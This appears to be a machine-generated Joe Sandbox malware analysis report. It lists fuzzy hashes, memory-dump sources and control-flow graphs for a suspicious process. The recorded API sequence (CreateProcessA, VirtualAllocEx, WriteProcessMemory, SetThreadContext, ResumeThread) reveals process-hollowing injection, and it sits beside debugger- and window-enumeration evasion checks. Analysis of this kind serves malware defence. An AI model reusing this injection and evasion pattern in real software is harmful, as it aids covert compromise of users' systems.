                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.626471703.0000000002CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2cf0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID: DK4l$Xc4l$lj$lj
                                                                                                                                                                                                                                                                                                                                                        • API String ID: 0-3905690326
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 7c519799deff1543e7dbfd4681eb64d036112fbba3bcd9fce1239c4fe207f33b
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 6950f3b6e0aaf56925938ab173899f3b2d547c574d38aa3692a543e10c287cff
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7c519799deff1543e7dbfd4681eb64d036112fbba3bcd9fce1239c4fe207f33b
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E05191747005108FC799DF39C494A6EBBF6AFCA60476A80A9D516DB761CF35DC02CB81
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.627763086.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2d80000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID: 3Fj^$CFj^$SFj^$cFj^
                                                                                                                                                                                                                                                                                                                                                        • API String ID: 0-3859340541
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 03dd841a23894bee1ad136667c946970f615a1eed37f526744707a80c9e0611e
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 060bdb242c260bed602df99979458579abe3da7e93545dc7b96d9ada72c4cc89
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 03dd841a23894bee1ad136667c946970f615a1eed37f526744707a80c9e0611e
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C521A1307007504FC775AB39901856BB3E6AFC11483198ABEC15ADB714DF73EC0A9BA5
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.627763086.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2d80000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID: 3Fj^$CFj^$SFj^$cFj^
                                                                                                                                                                                                                                                                                                                                                        • API String ID: 0-3859340541
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 7e93859af8e5fb738b265417460985f234fddf53e4a1e410bb1f9f6bc5f2b229
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 620ca73bc996c357d32ba32cfa0093729bd270f993048e75fa33cb4e24cc30d3
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7e93859af8e5fb738b265417460985f234fddf53e4a1e410bb1f9f6bc5f2b229
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2C216F307007505F8779AB39901856BB3E6AFC11483158A7ED11A9B714DF73EC099BA5
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                                                                                                                                                        Execution Coverage:18.4%
                                                                                                                                                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                                                                                                                        Signature Coverage:4.5%
                                                                                                                                                                                                                                                                                                                                                        Total number of Nodes:67
                                                                                                                                                                                                                                                                                                                                                        Total number of Limit Nodes:1
                                                                                                                                                                                                                                                                                                                                                        execution_graph 13905 502c7a0 13906 502c7ba 13905->13906 13909 502aa80 13906->13909 13910 502aac4 ResumeThread 13909->13910 13912 502ab10 13910->13912 13913 502aba0 13914 502abe9 SetThreadContext 13913->13914 13916 502ac61 13914->13916 13982 502b7b0 13983 502b7e3 13982->13983 13984 502b8e7 13983->13984 13986 502b2f0 13983->13986 13987 502b377 CreateProcessA 13986->13987 13989 502b5cc 13987->13989 13917 502ad88 13918 502adcc VirtualAllocEx 13917->13918 13920 502ae44 13918->13920 13990 502aed8 13991 502af24 WriteProcessMemory 13990->13991 13993 502afbd 13991->13993 13921 ee05c0 13922 ee05e2 13921->13922 13925 ee0b28 13922->13925 13923 ee0606 13926 ee0b84 13925->13926 13931 ee12bf 13926->13931 13938 ee1031 13926->13938 13950 ee1040 13926->13950 13927 ee0b94 13927->13923 13932 ee1266 13931->13932 13935 ee12ac 13931->13935 13962 ee0cfc 13932->13962 13934 ee1285 13934->13935 13966 ee2dc8 13934->13966 13970 ee2dc0 13934->13970 13935->13927 13941 ee1062 13938->13941 13939 ee125f 13940 ee0cfc FindCloseChangeNotification 13939->13940 13944 ee1285 13940->13944 13941->13939 13942 ee1205 13941->13942 13945 ee10a6 13941->13945 13974 ee29f8 13941->13974 13978 ee29f3 13941->13978 13943 ee0cfc FindCloseChangeNotification 13942->13943 13943->13939 13944->13945 13946 ee2dc8 EnumWindows 13944->13946 13947 ee2dc0 EnumWindows 13944->13947 13945->13927 13946->13945 13947->13945 13953 ee1062 13950->13953 13951 ee125f 13952 ee0cfc FindCloseChangeNotification 13951->13952 13956 ee1285 13952->13956 13953->13951 13954 ee1205 13953->13954 13957 ee10a6 13953->13957 13958 ee29f8 CheckRemoteDebuggerPresent 13953->13958 13959 ee29f3 CheckRemoteDebuggerPresent 13953->13959 13955 ee0cfc FindCloseChangeNotification 13954->13955 13955->13951 13956->13957 13960 ee2dc8 EnumWindows 13956->13960 13961 ee2dc0 EnumWindows 13956->13961 13957->13927 13958->13954 13959->13954 13960->13957 13961->13957 13963 ee2af8 FindCloseChangeNotification 13962->13963 13965 ee2b88 13963->13965 13965->13934 13967 ee2e0c EnumWindows 13966->13967 13969 ee2e73 13967->13969 13969->13935 13971 ee2e0c EnumWindows 13970->13971 13973 ee2e73 13971->13973 13973->13935 13975 ee2a41 CheckRemoteDebuggerPresent 13974->13975 13977 ee2a98 13975->13977 13977->13942 13979 ee2a41 CheckRemoteDebuggerPresent 13978->13979 13981 ee2a98 13979->13981 13981->13942

                                                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                                                                        control_flow_graph 1379 ee29f8-ee2a96 CheckRemoteDebuggerPresent 1382 ee2a9f-ee2ae3 1379->1382 1383 ee2a98-ee2a9e 1379->1383 1383->1382
                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                        • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 00EE2A86
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000011.00000002.701791049.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_ee0000_Systedbddfm.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID: CheckDebuggerPresentRemote
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3662101638-0
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: f52489cfb3bcebb73e064b50f1ee21453a35469283a30a7b0c3f5f5b365ef845
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 149167054e4deb95d28ff9ce8f1a7192aa8f0fc0462c3500c5f2f856b116b0fc
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f52489cfb3bcebb73e064b50f1ee21453a35469283a30a7b0c3f5f5b365ef845
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7E31A8B4D052589FCB10CFAAD984ADEFBF5BB49314F10942AE919B7200C774A946CF94
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                                                                        control_flow_graph 1120 502b2f0-502b389 1122 502b3d2-502b3fa 1120->1122 1123 502b38b-502b3a2 1120->1123 1127 502b440-502b496 1122->1127 1128 502b3fc-502b410 1122->1128 1123->1122 1126 502b3a4-502b3a9 1123->1126 1129 502b3ab-502b3b5 1126->1129 1130 502b3cc-502b3cf 1126->1130 1136 502b498-502b4ac 1127->1136 1137 502b4dc-502b5ca CreateProcessA 1127->1137 1128->1127 1138 502b412-502b417 1128->1138 1131 502b3b7 1129->1131 1132 502b3b9-502b3c8 1129->1132 1130->1122 1131->1132 1132->1132 1135 502b3ca 1132->1135 1135->1130 1136->1137 1146 502b4ae-502b4b3 1136->1146 1156 502b5d3-502b6b8 1137->1156 1157 502b5cc-502b5d2 1137->1157 1139 502b43a-502b43d 1138->1139 1140 502b419-502b423 1138->1140 1139->1127 1141 502b427-502b436 1140->1141 1142 502b425 1140->1142 1141->1141 1145 502b438 1141->1145 1142->1141 1145->1139 1148 502b4d6-502b4d9 1146->1148 1149 502b4b5-502b4bf 1146->1149 1148->1137 1150 502b4c3-502b4d2 1149->1150 1151 502b4c1 1149->1151 1150->1150 1153 502b4d4 1150->1153 1151->1150 1153->1148 1169 502b6ba-502b6be 1156->1169 1170 502b6c8-502b6cc 1156->1170 1157->1156 1169->1170 1171 502b6c0 1169->1171 1172 502b6ce-502b6d2 1170->1172 1173 502b6dc-502b6e0 1170->1173 1171->1170 1172->1173 1174 502b6d4 1172->1174 1175 502b6e2-502b6e6 1173->1175 1176 502b6f0-502b6f4 1173->1176 1174->1173 1175->1176 1177 502b6e8 1175->1177 1178 502b6f6-502b71f 1176->1178 1179 502b72a-502b735 1176->1179 1177->1176 1178->1179
                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0502B5B7
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000011.00000002.715359156.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_5020000_Systedbddfm.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID: CreateProcess
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID: 963392458-0
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: f4d950e336e93bbe9038942d84ad5cd7f4c8ea1a876a25883fc4be1015714da7
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 91943f229af520720a7532034bcd90910ec34f818d5853c1b91f7fa2a9ca0376
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f4d950e336e93bbe9038942d84ad5cd7f4c8ea1a876a25883fc4be1015714da7
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 61C12571D0422D8FDB20CFA4D984BEEBBB1BF49304F0091A9D949B7240DB749A85CF95
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                                                                        control_flow_graph 1313 502aed8-502af43 1315 502af45-502af57 1313->1315 1316 502af5a-502afbb WriteProcessMemory 1313->1316 1315->1316 1318 502afc4-502b016 1316->1318 1319 502afbd-502afc3 1316->1319 1319->1318
                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                        • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0502AFAB
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000011.00000002.715359156.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_5020000_Systedbddfm.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID: MemoryProcessWrite
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3559483778-0
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 33c471709c1850e253f22103132f327c4beb35bc08245958dff98018e8386ce0
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 3f9a56c949e107a6404a623c224dd090011766a206798a5c1b59123917546d6a
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 33c471709c1850e253f22103132f327c4beb35bc08245958dff98018e8386ce0
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0141A9B5D052589FCF00CFA9D984AEEFBF1BB49314F14902AE819B7200D778AA45CF64
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                                                                        control_flow_graph 1324 502ad88-502ae42 VirtualAllocEx 1327 502ae44-502ae4a 1324->1327 1328 502ae4b-502ae95 1324->1328 1327->1328
                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0502AE32
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000011.00000002.715359156.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_5020000_Systedbddfm.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: a665a3c66fc0e60da2b0cac22d5e00fb7a5054b35f732a47cf2445e6be1fe423
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: a04ce55cfd64875ac5c54710293a3918208a8761304b965d1218d6791f6ab4e2
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a665a3c66fc0e60da2b0cac22d5e00fb7a5054b35f732a47cf2445e6be1fe423
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5531A9B4D04258DFCF10CFA9D880ADEFBB5BB49310F10902AE915B7200D775A906CF95
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                                                                        control_flow_graph 1333 502aba0-502ac00 1335 502ac02-502ac14 1333->1335 1336 502ac17-502ac5f SetThreadContext 1333->1336 1335->1336 1338 502ac61-502ac67 1336->1338 1339 502ac68-502acb4 1336->1339 1338->1339
                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                        • SetThreadContext.KERNELBASE(?,?), ref: 0502AC4F
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000011.00000002.715359156.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_5020000_Systedbddfm.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID: ContextThread
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1591575202-0
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: ffb9675928cee3ecd1e4a9c8d1741ed9de115d18a3cd529caadb1cd886f597c0
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 09980ccb028279fa58082ec77f9f684f0dd182de684ad665d7a00e73b9e8830a
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ffb9675928cee3ecd1e4a9c8d1741ed9de115d18a3cd529caadb1cd886f597c0
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C731ABB4D05258DFCB10DFA9D984AEEFBF5BB48314F24802AE419B7240D778A945CF94
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                                                                        control_flow_graph 1344 ee2dc0-ee2e1b 1346 ee2e1d 1344->1346 1347 ee2e28-ee2e71 EnumWindows 1344->1347 1348 ee2e25 1346->1348 1350 ee2e7a-ee2ec6 1347->1350 1351 ee2e73-ee2e79 1347->1351 1348->1347 1351->1350
                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000011.00000002.701791049.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_ee0000_Systedbddfm.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID: EnumWindows
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1129996299-0
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: a4251eb6997c9d421efb7050ed8cef5ab024621f5b74ad3d397c76649b22fa6e
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: bc9e632c4c1c23cd7735b964d8953b8a25a5b6b5b8502953cb29e6bac2c8b3f5
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a4251eb6997c9d421efb7050ed8cef5ab024621f5b74ad3d397c76649b22fa6e
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E431CAB4D052589FCB14CFA9E884AEEFBB5BB89314F10942AE405B7310C774A946CF94
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                                                                        control_flow_graph 1357 ee2dc8-ee2e1b 1359 ee2e1d 1357->1359 1360 ee2e28-ee2e71 EnumWindows 1357->1360 1361 ee2e25 1359->1361 1363 ee2e7a-ee2ec6 1360->1363 1364 ee2e73-ee2e79 1360->1364 1361->1360 1364->1363
                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000011.00000002.701791049.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_ee0000_Systedbddfm.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID: EnumWindows
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1129996299-0
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 3c8a823c9183dc9665cf0734b0da516e0121ea1e1385e7c64883f7e754882d93
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 2135aab280d77fd47397776581018dd0149d2945bd525aef9e8f548cf598896a
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3c8a823c9183dc9665cf0734b0da516e0121ea1e1385e7c64883f7e754882d93
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3531D9B4D052589BCB14CFA9E880AEEFBB5BB89314F10A42AE805B7310C774A945CB94
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                                                                        control_flow_graph 1370 ee29f3-ee2a96 CheckRemoteDebuggerPresent 1373 ee2a9f-ee2ae3 1370->1373 1374 ee2a98-ee2a9e 1370->1374 1374->1373
                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                        • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 00EE2A86
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000011.00000002.701791049.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_ee0000_Systedbddfm.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID: CheckDebuggerPresentRemote
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3662101638-0
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 72ada95053f1f15e253106e6a4e91d6eded61458cc54cafcd9fb14e70fb3765b
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: bfe0a1bb5b00ba9a02b8ad1c454c3221da77e4bf10d790974df8f45335609b01
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 72ada95053f1f15e253106e6a4e91d6eded61458cc54cafcd9fb14e70fb3765b
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B831BBB4D052589FCF10CFA9D884AEEFBF5BB49314F10942AE915B7200C774A946CF94
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                                                                        control_flow_graph 1388 502aa80-502ab0e ResumeThread 1391 502ab10-502ab16 1388->1391 1392 502ab17-502ab59 1388->1392 1391->1392
                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                        • ResumeThread.KERNELBASE(?), ref: 0502AAFE
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000011.00000002.715359156.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_5020000_Systedbddfm.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID: ResumeThread
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID: 947044025-0
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: e6d5b78f76c9570ad3ed305ebcf5b2516bdbefba661b233aa2596d3b905f5643
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: f0176085b2a17e8e0f629a76d3774ccbfe2171e447bd81238d268c712206ef69
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e6d5b78f76c9570ad3ed305ebcf5b2516bdbefba661b233aa2596d3b905f5643
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0231ABB4D052589FCF14CFA9E994AEEFBB5BB48314F14902AE815B7300CB74A941CF94
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                        • FindCloseChangeNotification.KERNELBASE(?), ref: 00EE2B76
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000011.00000002.701791049.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_ee0000_Systedbddfm.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID: ChangeCloseFindNotification
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID: 2591292051-0
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 93e9003977efe144004cab345caf3141cc5431537de1776c1dafa07d6d17da2d
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 51c5214b5682e99e91b5835a0c1503b09fc98507a0f78e26fcff6c8115e688f6
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 93e9003977efe144004cab345caf3141cc5431537de1776c1dafa07d6d17da2d
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6B31AAB4D042589FCB10CFA9D484ADEFBF4AB49324F14902AE918B7300C374A841CFA5
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                        • FindCloseChangeNotification.KERNELBASE(?), ref: 00EE2B76
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000011.00000002.701791049.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_ee0000_Systedbddfm.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID: ChangeCloseFindNotification
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID: 2591292051-0
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: a5df7e39f0fd8f792a3ef5fc17209e16ec75ad726d84f4af2b4b8d8a14f2f2e0
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 5dce2ea1c8cfc2120c6c42303ecc2fc75104d04255398482548d775ca5d3bb38
